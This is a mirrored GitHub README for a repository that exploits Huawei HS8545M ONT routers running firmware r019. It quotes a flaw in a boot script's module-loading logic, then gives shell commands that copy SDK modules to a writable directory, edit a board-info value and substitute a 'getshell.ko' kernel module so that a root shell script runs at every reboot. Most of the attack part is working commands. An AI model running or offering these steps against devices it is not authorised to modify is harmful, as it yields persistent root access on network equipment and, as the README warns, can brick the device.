Giters

csnol / Exploit-HS8545M-ONT

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

Home Page:https://vps.gitbook.io/discount/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Note

This maybe brick your ONT device, use at your own risk!

Usage

Find an exploit to load userdefined ko module

an exploit in /etc/rc.d/rc.start/1.sdk_init.sh, use kernel module .ko to run a shell script /mnt/jffs2/hw/getshell.sh when system reboot.

Logical exploit in line 200-206

# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
	  cd /mnt/jffs2/TranStar/
	  echo "Loading the Temp HISI SD511X modules: "
else
	  cd /lib/modules/hisi_sdk
	  echo "Loading the HISI SD511X modules: "
fi

if /mnt/jffs2/TranStar/hi_sysctl.ko exsit, then execute cd /mnt/jffs2/TranStar/. That means work directory is /mnt/jffs2/TranStar/ now, and /mnt/jffs2/TranStar/ is writable. so

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

obj.id = "0x00000001" ; obj.value = "4";

Upload getshell.ko module, compiled by 0neday, only support r019

# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko

License

GPLv3.0

About

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

https://vps.gitbook.io/discount/

Languages

Language:Shell 78.1%Language:Python 14.6%Language:C 6.6%Language:Makefile 0.8%